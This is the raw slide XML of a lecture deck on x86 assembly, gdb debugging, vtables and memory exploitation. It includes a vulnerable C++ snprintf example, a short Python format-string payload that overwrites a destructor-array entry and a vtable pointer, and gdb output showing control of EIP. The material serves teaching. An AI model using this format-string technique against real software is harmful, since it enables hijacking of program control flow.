                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>0xf7feb606: mov esi,eax</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>0xf7feb608: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687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call DWORD PTR [edi+esi*4-0x4]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="321457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0xf7feb60c: sub esi,0x1</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>0xf7feb60f: jne 0xf7feb608 &lt;_dl_fini+472&gt;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0" indent="0" defTabSz="321457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x/2xw $edi</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>0x8049ac4: 0x080485f0 0x08048670</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>(gdb) disas 0x080485f0</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Dump of code for function __do_global_dtors_aux: [...]</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>(gdb) disas 0x08048670</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Dump of code for function vuln_fini():</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo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870660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Loads, Stores</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="147" name="Table 147"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1758135113"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2119360" y="1788239"/>
          <a:ext cx="7953281" cy="412755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88638"/>
                <a:gridCol w="2179363"/>
                <a:gridCol w="3585280"/>
              </a:tblGrid>
              <a:tr h="574051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Instruction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Effect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Description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57405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mov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Move y to x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7405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movsx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SignEx(x)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Move sign-extended y to x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7405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movzx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ZeroEx(x)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Move zero-extended y to x</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="628650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push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esp ← esp - 4
Mem(esp) ← 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Decrement stack pointer by 4, store x on the stack</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="628650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pop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x ← Mem(esp)
esp ← esp + 4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Load top of stack in x, increment stack pointer by 4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7405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lea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Addr(x)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Store address of x to y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54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922" name="Shape 9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v0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0x1111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8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v1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0x2222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v0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8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base_addr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0x8049ac8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base_off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struct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pack(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="168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'&lt;II'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base_addr, base_addr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'%0{0}x%{2}$hn%0{1}x%{3}$hn'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format(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v0,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v1,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base_off,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base_off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sys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stdout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write(buf)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92930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926" name="Shape 9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r ”$(cat input)”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starting up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buf = [...]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Program received signal SIGSEGV, Segmentation fault.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0x22221111 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in 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?? ()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1: x/i $eip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=&gt; 0x22221111: &lt;error: Cannot access memory at 0x22221111&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42016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vtables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="930" name="Shape 9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Let's look at one more example of function pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>C++ makes heavy use of function pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Think virtual functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Which method is invoked can depend on the dynamic type of an object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>As usual, the solution is indirection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Objects contain </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" i="1"/>
              <a:t>vtables</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>, or vectors of function pointers to implementations of virtual methods for that object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131275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vtables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934" name="Shape 9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class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316" b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Base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public:</a:t>
            </a:r>
            <a:endParaRPr sz="1316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31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virtual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~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Base(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="131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}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endParaRPr sz="1316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31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virtual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31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Speak(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="131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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="131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const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std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::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cout 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&lt;&lt;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316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"Base reporting in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1316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sz="1316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}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};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endParaRPr sz="1316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class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316" b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Derived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31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public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Base {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public:</a:t>
            </a:r>
            <a:endParaRPr sz="1316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31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virtual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31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Speak(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="131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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="131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const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std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::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cout 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&lt;&lt;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316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"Derived here</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1316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sz="1316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}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};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endParaRPr sz="1316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316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main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31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argc, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="131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**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argv) {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31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buf[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256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std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::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unique_ptr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&gt;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obj(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="131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new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Derived());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snprintf(buf, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="131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(buf), argv[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]);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printf(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1316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"buf = %s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1316" b="1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sz="1316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buf);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obj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-&gt;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Speak();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31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31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250736">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="187517" algn="l"/>
                <a:tab pos="383963" algn="l"/>
                <a:tab pos="580409" algn="l"/>
                <a:tab pos="776855" algn="l"/>
                <a:tab pos="973301" algn="l"/>
                <a:tab pos="1169747" algn="l"/>
                <a:tab pos="1357264" algn="l"/>
                <a:tab pos="1553710" algn="l"/>
                <a:tab pos="1750157" algn="l"/>
                <a:tab pos="1946603" algn="l"/>
                <a:tab pos="2143049" algn="l"/>
                <a:tab pos="2339495" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="131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813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vtables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="93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3645" y="1472548"/>
            <a:ext cx="6724710" cy="46497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375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vtables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="942" name="Shape 9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0x8048b50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deref unique_ptr&lt;Base&gt;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ecx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get pointer to vtable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ecx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ecx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+0x08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get vtable entry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set "this"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-0x0128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ecx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call method</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="667108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vtables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="946" name="Shape 9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r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0x080489c3 in main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28 obj-&gt;Speak()</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687" i="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>;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1: x/i $eip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=&gt; 0x80489c3: mov ecx,DWORD PTR [eax]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Value returned is $1 = (Base *) 0x804b008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si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28 obj-&gt;Speak()</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687" i="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>;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1: x/i $eip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=&gt; 0x80489c5: mov ecx,DWORD PTR [ecx+0x8]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x/4xw $ecx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0x804ac38: 0x08049130 0x08049160 0x080491a0 0x00000000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disas 0x08049130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Dump of code for function Derived::~Derived():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[...]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disas 0x080491a0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Dump of code for function Derived::Speak() const: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[...]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22850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950" name="Shape 9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v0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0x1111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8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v1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0x2222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v0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8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base_addr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FF2500"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>0x804ac3c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base_off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struct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pack(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="168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'&lt;II'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base_addr, base_addr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+=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'%0{0}x%{2}$hn%0{1}x%{3}$hn'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format(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v0,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v1,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base_off,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base_off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sys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stdout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write(buf)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164532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Shape 9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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="954" name="Shape 9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r ”$(cat input)”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starting up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buf = [...]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Program received signal SIGSEGV, Segmentation fault.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0x22221111 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687" b="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>?? ()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1: x/i $eip </a:t>
            </a:r>
            <a:endParaRPr sz="1687">
              <a:latin typeface="Times"/>
              <a:ea typeface="Times"/>
              <a:cs typeface="Times"/>
              <a:sym typeface="Times"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="321457" indent="-321457" defTabSz="321457">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="98223" algn="l"/>
                <a:tab pos="321457" algn="l"/>
              </a:tabLst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=&gt; 0x22221111: &lt;error: Cannot access memory at 0x22221111&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="200634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Many slides courtesy of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Wil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> Robertson: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://wkr.io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gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>quick reference: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.cs.earlham.edu/~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>psg/tutorials/gdb_quickref.pdf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9373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Endian-ness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2193727" y="4089472"/>
            <a:ext cx="7804547" cy="21613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The x86 family is a little-endian architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Multi-byte values stored least-significant byte first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>For example, if you have a uint8_t pointer to an address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0" smtClean="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:endParaRPr sz="2250" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>What is the value of x[0]? x[3]?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="152" name="endian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11563" y="1219931"/>
            <a:ext cx="3568875" cy="27168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4393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Review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Machine Model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Assembly Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Debugging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9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Types?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Memory at this level is just a big chunk of bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>No primitive types, structs, classes, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Data can have multiple interpretations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Signed or unsigned? Integer or string?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Store a 32-bit value, read back a 16-bit value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Overlapping loads, stores</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2600716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Arithmetic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="160" name="Table 160"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2433245294"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2119360" y="1681083"/>
          <a:ext cx="7953281" cy="42326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88638"/>
                <a:gridCol w="2179363"/>
                <a:gridCol w="3585280"/>
              </a:tblGrid>
              <a:tr h="803672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Instruction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Effect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Description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803672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add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y + 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Add x to y</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="803672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sub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y - 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Subtract x from y</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="91082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mul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r ← eax · x
edx ← High(r)
eax ← Low(r)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Signed multiply of eax and x, high bits stored in edx, low bits stored in eax</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="91082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div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r ← (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>edx:eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>) / x
</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>edx</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> ← Rem(r)
</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> ← Quo(r)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Divides </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>edx:eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> by x, remainder stored in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>edx</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>, quotient stored in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>eax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65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Logic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="164" name="Table 164"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37851063"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2119359" y="1681083"/>
          <a:ext cx="7953281" cy="42326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88638"/>
                <a:gridCol w="2179363"/>
                <a:gridCol w="3585280"/>
              </a:tblGrid>
              <a:tr h="488385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Instruction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Effect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Description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88385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and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y ← y ∧ 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Logical AND stored in y</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="488385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or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y ∨ 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Logical OR stored in y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5350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xor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y ⊕ x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Logical XOR stored in y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5350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shl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ShiftLeft(x)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Shift y left by x bits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5350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shr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ShiftRight(x)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Shift y right by x bits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5350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sal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SShiftLeft(x)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Signed left shift</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="55350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rol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y ← RotateLeft(x)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Rotate y left by x bits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78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Comparison</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="168" name="Table 168"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2283177854"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2119359" y="1681083"/>
          <a:ext cx="7953281" cy="423267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88638"/>
                <a:gridCol w="2179363"/>
                <a:gridCol w="3585280"/>
              </a:tblGrid>
              <a:tr h="1410891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Instruction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Effect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Description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141089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test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t ← y ∧ x
SF ← MSB(t)
ZF ← t = 0?
...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Perform logical AND, set SF if MSB set in result, set ZF if result is 0, ...</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="141089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cmp y,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t ← y - x
SF ← MSB(t)
ZF ← t = 0?
...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Perform signed subtraction, set SF if MSB set in result, set ZF if result is 0, ...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95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Control Transfers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Control transfers change the control flow of programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Can be predicated on results of a prior comparison</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Arithmetic, logic instructions </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" i="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> set flags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Distinction between </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" i="1"/>
              <a:t>jumps</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" i="1"/>
              <a:t>calls</a:t>
            </a:r>
            <a:endParaRPr sz="2250"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Jumps transfer control, calls used to implement procedures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Distinction between </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" i="1"/>
              <a:t>direct</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" i="1"/>
              <a:t>indirect</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> transfers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Direct transfers use relative offsets, indirect transfers are absolute through a register or memory reference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24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415600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Control Transfers (Jumps)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25</a:t>
            </a:fld>
            <a:endParaRPr sz="984"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="176" name="Table 176"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2242045821"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2119360" y="1681083"/>
          <a:ext cx="7953281" cy="42326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88638"/>
                <a:gridCol w="2179363"/>
                <a:gridCol w="3585280"/>
              </a:tblGrid>
              <a:tr h="423267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Instruction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Condition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Description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42326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jmp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unconditional</a:t>
                      </a:r>
